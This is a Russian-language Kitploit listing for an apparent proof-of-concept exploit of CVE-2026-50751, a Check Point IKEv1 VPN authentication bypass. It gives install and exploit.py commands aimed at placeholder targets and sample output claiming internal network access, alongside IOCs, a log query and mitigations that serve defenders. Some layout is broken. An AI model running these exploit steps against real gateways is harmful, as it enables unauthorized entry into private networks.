Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-50751---Check-Point-IKEv1-Authentication-Bypass-Exploit — Уязвимость: слабость логики потока в удаленном доступе и мобильном доступе | Kitploit
Инструменты/GitHubGitHub/fevar54/cve-2026-50751---check-point-ikev1-authentication-bypass-exploit
Аутентификация и авторизацияСканеры уязвимостейАнализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на Проникновение
GitHubfevar54/cve-2026-50751---check-point-ikev1-authentication-bypass-exploit

CVE-2026-50751---Check-Point-IKEv1-Authentication-Bypass-Exploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Уязвимость: слабость логики потока в удаленном доступе и мобильном доступе

Репозиторий
1373 месяцев назадЕщё не проверено

CVE-2026-50751 - Эксплойт обхода аутентификации Check Point IKEv1

Security Rating CVSS CISA KEV License Python

⚠️ ВАЖНОЕ ПРЕДУПРЕЖДЕНИЕ

Этот код ТОЛЬКО для образовательных целей и авторизованных тестов безопасности. Неавторизованное использование против систем без явного разрешения НЕЗАКОННО. Автор не несет ответственности за неправильное использование этого инструмента.

📋 Описание

CVE-2026-50751 — это критическая уязвимость обхода аутентификации в протоколе IKEv1 (устаревший) от Check Point, затрагивающая Remote Access VPN и Mobile Access. Неаутентифицированный злоумышленник может использовать ошибку в проверке сертификатов для установки VPN-соединения без необходимости в действующем пароле.

Технические детали

  • Тип: Authentication Bypass (CWE-287)
  • Оценка CVSS: 9.3 (Critical)
  • Вектор: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
  • Активная эксплуатация: Да (с 2026-05-07)
  • CISA KEV: Добавлено 2026-06-08, Крайний срок 2026-06-11

🎯 Уязвимые версии

ПродуктВерсии
Security GatewaysR80.40 - R82.10 с включенным IKEv1
Spark FirewallsR80.20.X, R81.10.X, R82.00.X
Mobile AccessВсе версии с IKEv1

Необходимые условия

  • ✅ Remote Access VPN или Mobile Access включен
  • ✅ IKEv1 включен для удаленного доступа
  • ✅ Шлюз принимает устаревшие Remote Access клиенты
  • ✅ Не требует машинного сертификата

🔧 Установка

root@kitploit:~
# Клонировать репозиторий
git clone https://github.com/username/CVE-2026-50751-PoC
cd CVE-2026-50751-PoC

# Установить зависимости
pip install -r requirements.txt

# Дать права на выполнение
chmod +x exploit.py

📦 Зависимости

root@kitploit:~
cryptography>=41.0.0
scapy>=2.5.0
colorama>=0.4.6

🚀 Использование

Сканирование обнаружения

root@kitploit:~
# Обнаружить, включен ли IKEv1
python3 detector.py -t 192.168.1.1 -p 500

# Быстрое сканирование
python3 detector.py -t vpn.target.com -p 4500

Эксплуатация (ТОЛЬКО АВТОРИЗОВАННОЕ ИСПОЛЬЗОВАНИЕ)

root@kitploit:~
# Выполнить обход аутентификации
python3 exploit.py -t 192.168.1.1 -p 500

# С указанием интерфейса
python3 exploit.py -t vpn.target.com --interface eth0

# Подробный режим
python3 exploit.py -t 192.168.1.1 -p 500 -v

Ожидаемый вывод

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║  CVE-2026-50751 - Check Point IKEv1 Authentication Bypass   ║
║  Critical VPN Authentication Bypass Exploit                 ║
║  CVSS: 9.3 | CISA KEV: 2026-06-08                          ║
╚═══════════════════════════════════════════════════════════════╝

[1] Initiating IKEv1 Main Mode...
[+] Received response - SPI: a1b2c3d4e5f67890
[2] Sending crafted KE + NONCE payloads...
[+] Gateway accepted crafted KE/NONCE - Vulnerability triggered!
[3] Calculating authentication keys...
[4] Sending spoofed authentication...
[+] SUCCESS! Authentication bypassed!
[+] Established IKE SA without valid credentials
[5] Establishing VPN tunnel...
[+] VPN tunnel established!
[+] Internal network access available

[✓] EXPLOIT SUCCESSFUL
[✓] Authentication bypass achieved
[✓] VPN tunnel established
[!] System is VULNERABLE - Apply hotfix immediately

🔍 Обнаружение компрометации

Поиск в логах SmartConsole

root@kitploit:~
# Запрос для обнаружения злоумышленников
action:"Key Install" AND (src:45.77.149.152 OR dst:45.77.149.152)

Известные IOCs

ТипЗначение
IP-адреса злоумышленников45.77.149.152, 209.182.225.136, 38.60.157.139, 162.33.177.101, 45.76.26.42, 144.208.127.155, 38.54.88.201, 38.54.107.167, 66.42.99.200, 45.63.104.106, 45.61.136.173
Хеши52fda5c1b9704544f32ee98d9060e689, 51d39aa39478beeac94f2d12f682ecce

🛡️ Смягчение

Вариант 1 - Применить Hotfix (РЕКОМЕНДУЕТСЯ)

ВерсияНомер Hotfix

Вариант 2 - Временные меры

Отключить устаревшие клиенты:

  • SmartConsole → Gateway → VPN Clients → Authentication
  • Снять флажок «Allow older clients»

Принудительно использовать только IKEv2:

  • Global Properties → Remote Access → VPN Authentication
  • Выбрать «IKEv2 only»

Сделать обязательным машинный сертификат:

  • VPN Clients → Authentication → Machine Certificate Authentication
  • Установить как «Mandatory»

📚 Ссылки

  • NVD - CVE-2026-50751
  • Check Point SK185033
  • CISA Known Exploited Vulnerabilities
  • Blog Post - Check Point Research

📊 Хронология

ДатаСобытие
2026-05-07Первая эксплуатация зафиксирована
2026-06-04Check Point начинает расследование
2026-06-08CVE опубликован, CISA добавляет в KEV
2026-06-11Крайний срок CISA для исправления

⚖️ Отказ от ответственности

Это программное обеспечение предоставляется «как есть», без каких-либо гарантий. Автор не несет ответственности за неправомерное использование этого инструмента. Используйте его только на системах, которыми вы владеете или имеете явное разрешение на тестирование.

📞 Контакты

Для сообщения об ошибках или внесения вклада:

  • Открыть issue на GitHub
  • Контакт: [email protected]

🌟 Благодарности

  • Check Point Research - за обнаружение и анализ
  • CISA - за координацию и распространение
  • Сообщество безопасности - за быструю реакцию

⭐ Если этот PoC был вам полезен, поставьте звезду репозиторию

📄 ЛИЦЕНЗИЯ (GPLv3)

📦 requirements.txt

root@kitploit:~
cryptography>=41.0.0
scapy>=2.5.0
colorama>=0.4.6

⚠️ Важное примечание для GitHub:

Скачать инструмент
Ссылка
R82.10Take 19Скачать
R82Take 103Скачать
R81.20Take 141Скачать